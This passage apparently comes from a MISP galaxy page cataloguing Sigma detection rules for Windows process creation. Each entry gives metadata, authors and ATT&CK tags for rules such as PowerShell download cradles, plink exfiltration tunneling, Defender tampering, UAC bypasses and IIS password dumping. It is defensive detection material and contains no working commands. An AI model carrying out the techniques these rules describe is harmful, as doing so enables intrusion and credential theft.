author Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/15
falsepositive ['Unknown']
filename proc_creation_win_certutil_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Suspicious Execution of Systeminfo

Detects usage of the "systeminfo" command to retrieve information

Internal MISP references

UUID 0ef56343-059e-4cb6-adc1-4c3c967c5e46 which can be used as unique global reference for Suspicious Execution of Systeminfo in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/01
falsepositive ['Unknown']
filename proc_creation_win_systeminfo_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Domain Trust Discovery Via Dsquery

Detects execution of "dsquery.exe" for domain trust discovery

Internal MISP references

UUID 3bad990e-4848-4a78-9530-b427d854aac0 which can be used as unique global reference for Domain Trust Discovery Via Dsquery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus, Tony Lambert, oscd.community, omkar72
creation_date 2019/10/24
falsepositive ['Legitimate use of the utilities by legitimate user for legitimate reason']
filename proc_creation_win_dsquery_domain_trust_discovery.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1482']
Related clusters

To see the related clusters, click here.

Suspicious Scan Loop Network

Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system

Internal MISP references

UUID f8ad2e2c-40b6-4117-84d7-20b89896ab23 which can be used as unique global reference for Suspicious Scan Loop Network in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/12
falsepositive ['Legitimate script']
filename proc_creation_win_susp_network_scan_loop.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059', 'attack.discovery', 'attack.t1018']
Related clusters

To see the related clusters, click here.

Logged-On User Password Change Via Ksetup.EXE

Detects password change for the logged-on user's via "ksetup.exe"

Internal MISP references

UUID c9783e20-4793-4164-ba96-d9ee483992c4 which can be used as unique global reference for Logged-On User Password Change Via Ksetup.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/06
falsepositive ['Unknown']
filename proc_creation_win_ksetup_password_change_user.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious JavaScript Execution Via Mshta.EXE

Detects execution of javascript code using "mshta.exe".

Internal MISP references

UUID 67f113fa-e23d-4271-befa-30113b3e08b1 which can be used as unique global reference for Suspicious JavaScript Execution Via Mshta.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
creation_date 2019/10/24
falsepositive ['Unknown']
filename proc_creation_win_mshta_javascript.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.005']
Related clusters

To see the related clusters, click here.

Ruby Inline Command Execution

Detects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.

Internal MISP references

UUID 20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8 which can be used as unique global reference for Ruby Inline Command Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/02
falsepositive ['Unknown']
filename proc_creation_win_ruby_inline_command_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Execution of plink to perform data exfiltration and tunneling

Internal MISP references

UUID f38ce0b9-5e97-4b47-a211-7dc8d8b871da which can be used as unique global reference for Potential RDP Tunneling Via Plink in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/04
falsepositive ['Unknown']
filename proc_creation_win_plink_susp_tunneling.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1572']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Logon Scripts - CommandLine

Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence

Internal MISP references

UUID 21d856f9-9281-4ded-9377-51a1a6e2a432 which can be used as unique global reference for Potential Persistence Via Logon Scripts - CommandLine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tom Ueltschi (@c_APT_ure)
creation_date 2019/01/12
falsepositive ['Legitimate addition of Logon Scripts via the command line by administrators or third party tools']
filename proc_creation_win_registry_logon_script.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1037.001']
Related clusters

To see the related clusters, click here.

Delete Important Scheduled Task

Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities

Internal MISP references

UUID dbc1f800-0fe0-4bc0-9c66-292c2abe3f78 which can be used as unique global reference for Delete Important Scheduled Task in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/09
falsepositive ['Unlikely']
filename proc_creation_win_schtasks_delete.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1489']
Related clusters

To see the related clusters, click here.

Obfuscated IP Download Activity

Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command

Internal MISP references

UUID cb5a2333-56cf-4562-8fcb-22ba1bca728d which can be used as unique global reference for Obfuscated IP Download Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
creation_date 2022/08/03
falsepositive ['Unknown']
filename proc_creation_win_susp_obfuscated_ip_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery']

Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE

Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData.

Internal MISP references

UUID 48917adc-a28e-4f5d-b729-11e75da8941f which can be used as unique global reference for Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/13
falsepositive ['Legitimate use']
filename proc_creation_win_reg_defender_exclusion.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Interesting Service Enumeration Via Sc.EXE

Detects the enumeration and query of interesting and in some cases sensitive services on the system via "sc.exe". Attackers often try to enumerate the services currently running on a system in order to find different attack vectors.

Internal MISP references

UUID e83e8899-c9b2-483b-b355-5decc942b959 which can be used as unique global reference for Interesting Service Enumeration Via Sc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2024/02/12
falsepositive ['Unknown']
filename proc_creation_win_sc_query_interesting_services.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.t1003']
Related clusters

To see the related clusters, click here.

Suspicious Windows Defender Registry Key Tampering Via Reg.EXE

Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection

Internal MISP references

UUID 452bce90-6fb0-43cc-97a5-affc283139b3 which can be used as unique global reference for Suspicious Windows Defender Registry Key Tampering Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/03/22
falsepositive ['Rare legitimate use by administrators to test software (should always be investigated)']
filename proc_creation_win_reg_windows_defender_tamper.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Kernel Memory Dump Via LiveKD

Detects execution of LiveKD with the "-m" flag to potentially dump the kernel memory

Internal MISP references

UUID c7746f1c-47d3-43d6-8c45-cd1e54b6b0a2 which can be used as unique global reference for Kernel Memory Dump Via LiveKD in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/16
falsepositive ['Unlikely in production environment']
filename proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Wusa Extracting Cab Files

Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument which is not longer supported. This could indicate an attacker using an old technique

Internal MISP references

UUID 59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9 which can be used as unique global reference for Wusa Extracting Cab Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/04
falsepositive ['The "extract" flag still works on older \'wusa.exe\' versions, which could be a legitimate use (monitor the path of the cab being extracted)']
filename proc_creation_win_wusa_cab_files_extraction.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Process Created Via Wmic.EXE

Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsrv32", etc.

Internal MISP references

UUID 3c89a1e8-0fba-449e-8f1b-8409d6267ec8 which can be used as unique global reference for Suspicious Process Created Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/10/12
falsepositive ['Unknown']
filename proc_creation_win_wmic_susp_process_creation.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

Suspicious Process Execution From Fake Recycle.Bin Folder

Detects process execution from a fake recycle bin folder, often used to avoid security solution.

Internal MISP references

UUID 5ce0f04e-3efc-42af-839d-5b3a543b76c0 which can be used as unique global reference for Suspicious Process Execution From Fake Recycle.Bin Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/07/12
falsepositive ['Unknown']
filename proc_creation_win_susp_recycle_bin_fake_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion']

Suspicious HH.EXE Execution

Detects a suspicious execution of a Microsoft HTML Help (HH.exe)

Internal MISP references

UUID e8a95b5e-c891-46e2-b33a-93937d3abc31 which can be used as unique global reference for Suspicious HH.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Maxim Pavlunin
creation_date 2020/04/01
falsepositive ['Unknown']
filename proc_creation_win_hh_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.initial_access', 'attack.t1047', 'attack.t1059.001', 'attack.t1059.003', 'attack.t1059.005', 'attack.t1059.007', 'attack.t1218', 'attack.t1218.001', 'attack.t1218.010', 'attack.t1218.011', 'attack.t1566', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

Webshell Tool Reconnaissance Activity

Detects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands

Internal MISP references

UUID f64e5c19-879c-4bae-b471-6d84c8339677 which can be used as unique global reference for Webshell Tool Reconnaissance Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cian Heasley, Florian Roth (Nextron Systems)
creation_date 2020/07/22
falsepositive ['Unknown']
filename proc_creation_win_webshell_tool_recon.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Computer Password Change Via Ksetup.EXE

Detects password change for the computer's domain account or host principal via "ksetup.exe"

Internal MISP references

UUID de16d92c-c446-4d53-8938-10aeef41c8b6 which can be used as unique global reference for Computer Password Change Via Ksetup.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/06
falsepositive ['Unknown']
filename proc_creation_win_ksetup_password_change_computer.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Eventlog Clear or Configuration Change

Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).

Internal MISP references

UUID cc36992a-4671-4f21-a91d-6c2b72a2edf5 which can be used as unique global reference for Suspicious Eventlog Clear or Configuration Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105
creation_date 2019/09/26
falsepositive ['Admin activity', 'Scripts and administrative tools used in the monitored environment', 'Maintenance activity']
filename proc_creation_win_susp_eventlog_clear.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.001', 'attack.t1562.002', 'car.2016-04-002']
Related clusters

To see the related clusters, click here.

Suspicious Certreq Command to Download

Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files

Internal MISP references

UUID 4480827a-9799-4232-b2c4-ccc6c4e9e12b which can be used as unique global reference for Suspicious Certreq Command to Download in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/11/24
falsepositive ['Unlikely']
filename proc_creation_win_lolbin_susp_certreq_download.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Renamed BrowserCore.EXE Execution

Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)

Internal MISP references

UUID 8a4519e8-e64a-40b6-ae85-ba8ad2177559 which can be used as unique global reference for Renamed BrowserCore.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2022/06/02
falsepositive ['Unknown']
filename proc_creation_win_renamed_browsercore.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1528', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

Potential Script Proxy Execution Via CL_Mutexverifiers.ps1

Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands

Internal MISP references

UUID 1e0e1a81-e79b-44bc-935b-ddb9c8006b3d which can be used as unique global reference for Potential Script Proxy Execution Via CL_Mutexverifiers.ps1 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113
creation_date 2022/05/21
falsepositive ['Unknown']
filename proc_creation_win_powershell_cl_mutexverifiers.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1216']
Related clusters

To see the related clusters, click here.

HackTool - Default PowerSploit/Empire Scheduled Task Creation

Detects the creation of a schtask via PowerSploit or Empire Default Configuration.

Internal MISP references

UUID 56c217c3-2de2-479b-990f-5c109ba8458f which can be used as unique global reference for HackTool - Default PowerSploit/Empire Scheduled Task Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, @Karneades
creation_date 2018/03/06
falsepositive ['Unlikely']
filename proc_creation_win_hktl_powersploit_empire_default_schtasks.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.privilege_escalation', 'attack.s0111', 'attack.g0022', 'attack.g0060', 'car.2013-08-001', 'attack.t1053.005', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Tor Client/Browser Execution

Detects the use of Tor or Tor-Browser to connect to onion routing networks

Internal MISP references

UUID 62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c which can be used as unique global reference for Tor Client/Browser Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/20
falsepositive ['Unknown']
filename proc_creation_win_browsers_tor_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090.003']
Related clusters

To see the related clusters, click here.

PUA - Seatbelt Execution

Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters

Internal MISP references

UUID 38646daa-e78f-4ace-9de0-55547b2d30da which can be used as unique global reference for PUA - Seatbelt Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/18
falsepositive ['Unlikely']
filename proc_creation_win_pua_seatbelt.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1526', 'attack.t1087', 'attack.t1083']
Related clusters

To see the related clusters, click here.

HackTool - Inveigh Execution

Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool

Internal MISP references

UUID b99a1518-1ad5-4f65-bc95-1ffff97a8fd0 which can be used as unique global reference for HackTool - Inveigh Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/24
falsepositive ['Very unlikely']
filename proc_creation_win_hktl_inveigh.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

UAC Bypass Abusing Winsat Path Parsing - Process

Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)

Internal MISP references

UUID 7a01183d-71a2-46ad-ad5c-acd989ac1793 which can be used as unique global reference for UAC Bypass Abusing Winsat Path Parsing - Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_winsat.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Child Process Of Regsvr32

Detects potentially suspicious child processes of "regsvr32.exe".

Internal MISP references

UUID 6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca which can be used as unique global reference for Potentially Suspicious Child Process Of Regsvr32 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/05/05
falsepositive ['Unlikely, but can rarely occur. Apply additional filters accordingly.']
filename proc_creation_win_regsvr32_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

Webshell Detection With Command Line Keywords

Detects certain command line parameters often used during reconnaissance activity via web shells

Internal MISP references

UUID bed2a484-9348-4143-8a8a-b801c979301c which can be used as unique global reference for Webshell Detection With Command Line Keywords in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community
creation_date 2017/01/01
falsepositive ['Unknown']
filename proc_creation_win_webshell_recon_commands_and_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003', 'attack.t1018', 'attack.t1033', 'attack.t1087']
Related clusters

To see the related clusters, click here.

LOLBIN Execution From Abnormal Drive

Detects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO.

Internal MISP references

UUID d4ca7c59-e9e4-42d8-bf57-91a776efcb87 which can be used as unique global reference for LOLBIN Execution From Abnormal Drive in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - SEC Consult '@angelo_violetti', Aaron Herman
creation_date 2022/01/25
falsepositive ['Rare false positives could occur on servers with multiple drives.']
filename proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Suspicious Execution of Shutdown to Log Out

Detects the rare use of the command line tool shutdown to logoff a user

Internal MISP references

UUID ec290c06-9b6b-4338-8b6b-095c0f284f10 which can be used as unique global reference for Suspicious Execution of Shutdown to Log Out in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/10/01
falsepositive ['Unknown']
filename proc_creation_win_shutdown_logoff.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1529']
Related clusters

To see the related clusters, click here.

Unmount Share Via Net.EXE

Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation

Internal MISP references

UUID cb7c4a03-2871-43c0-9bbb-18bbdb079896 which can be used as unique global reference for Unmount Share Via Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, @redcanary, Zach Stanford @svch0st
creation_date 2020/10/08
falsepositive ['Administrators or Power users may remove their shares via cmd line']
filename proc_creation_win_net_share_unmount.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.005']
Related clusters

To see the related clusters, click here.

Add Insecure Download Source To Winget

Detects usage of winget to add a new insecure (http) download source. Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)

Internal MISP references

UUID 81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2 which can be used as unique global reference for Add Insecure Download Source To Winget in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/17
falsepositive ['False positives might occur if the users are unaware of such control checks']
filename proc_creation_win_winget_add_insecure_custom_source.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Launch-VsDevShell.PS1 Proxy Execution

Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.

Internal MISP references

UUID 45d3a03d-f441-458c-8883-df101a3bb146 which can be used as unique global reference for Launch-VsDevShell.PS1 Proxy Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/19
falsepositive ['Legitimate usage of the script by a developer']
filename proc_creation_win_lolbin_launch_vsdevshell.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1216.001']
Related clusters

To see the related clusters, click here.

Interactive AT Job

Detects an interactive AT job, which may be used as a form of privilege escalation.

Internal MISP references

UUID 60fc936d-2eb0-4543-8a13-911c750a1dfc which can be used as unique global reference for Interactive AT Job in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
creation_date 2019/10/24
falsepositive ['Unlikely (at.exe deprecated as of Windows 8)']
filename proc_creation_win_at_interactive_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1053.002']
Related clusters

To see the related clusters, click here.

Suspicious Download From File-Sharing Website Via Bitsadmin

Detects usage of bitsadmin downloading a file from a suspicious domain

Internal MISP references

UUID 8518ed3d-f7c9-4601-a26c-f361a4256a0c which can be used as unique global reference for Suspicious Download From File-Sharing Website Via Bitsadmin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/06/28
falsepositive ['Some legitimate apps use this, but limited.']
filename proc_creation_win_bitsadmin_download_file_sharing_domains.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197', 'attack.s0190', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

Sdiagnhost Calling Suspicious Child Process

Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)

Internal MISP references

UUID f3d39c45-de1a-4486-a687-ab126124f744 which can be used as unique global reference for Sdiagnhost Calling Suspicious Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nextron Systems
creation_date 2022/06/01
falsepositive ['Unknown']
filename proc_creation_win_sdiagnhost_susp_child.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious Child Process of AspNetCompiler

Detects potentially suspicious child processes of "aspnet_compiler.exe".

Internal MISP references

UUID 9ccba514-7cb6-4c5c-b377-700758f2f120 which can be used as unique global reference for Suspicious Child Process of AspNetCompiler in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/14
falsepositive ['Unknown']
filename proc_creation_win_aspnet_compiler_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Microsoft IIS Service Account Password Dumped

Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords

Internal MISP references

UUID 2d3cdeec-c0db-45b4-aa86-082f7eb75701 which can be used as unique global reference for Microsoft IIS Service Account Password Dumped in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Janantha Marasinghe, Elastic (original idea)
creation_date 2022/11/08
falsepositive ['Unknown']
filename proc_creation_win_iis_appcmd_service_account_password_dumped.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003']
Related clusters

To see the related clusters, click here.

System File Execution Location Anomaly

Detects a Windows program executable started from a suspicious folder

Internal MISP references

UUID e4a6b256-3e47-40fc-89d2-7a477edd6915 which can be used as unique global reference for System File Execution Location Anomaly in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali
creation_date 2017/11/27
falsepositive ['Exotic software']
filename proc_creation_win_susp_system_exe_anomaly.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

PowerShell Download and Execution Cradles

Detects PowerShell download and execution cradles.

Internal MISP references

UUID 85b0b087-eddf-4a2b-b033-d771fa2b9775 which can be used as unique global reference for PowerShell Download and Execution Cradles in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/24
falsepositive ['Some PowerShell installers were seen using similar combinations. Apply filters accordingly']
filename proc_creation_win_powershell_download_iex.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Arbitrary File Download Via GfxDownloadWrapper.EXE

Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file.

Internal MISP references

UUID eee00933-a761-4cd0-be70-c42fe91731e7 which can be used as unique global reference for Arbitrary File Download Via GfxDownloadWrapper.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

UAC Bypass Using MSConfig Token Modification - Process

Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)

Internal MISP references

UUID ad92e3f9-7eb6-460e-96b1-582b0ccbb980 which can be used as unique global reference for UAC Bypass Using MSConfig Token Modification - Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_msconfig_gui.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Service Reconnaissance Via Wmic.EXE

An adversary might use WMI to check if a certain remote service is running on a remote device. When the test completes, a service information will be displayed on the screen if it exists. A common feedback message is that "No instance(s) Available" if the service queried is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable

Internal MISP references

UUID 76f55eaa-d27f-4213-9d45-7b0e4b60bbae which can be used as unique global reference for Service Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/14
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_service.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

Sysmon Configuration Update

Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely

Internal MISP references

UUID 87911521-7098-470b-a459-9a57fc80bdfd which can be used as unique global reference for Sysmon Configuration Update in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/09
falsepositive ['Legitimate administrators might use this command to update Sysmon configuration.']
filename proc_creation_win_sysinternals_sysmon_config_update.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Script Interpreter Execution From Suspicious Folder

Detects a suspicious script execution in temporary folders or folders accessible by environment variables

Internal MISP references

UUID 1228c958-e64e-4e71-92ad-7d429f4138ba which can be used as unique global reference for Script Interpreter Execution From Suspicious Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/02/08
falsepositive ['Unknown']
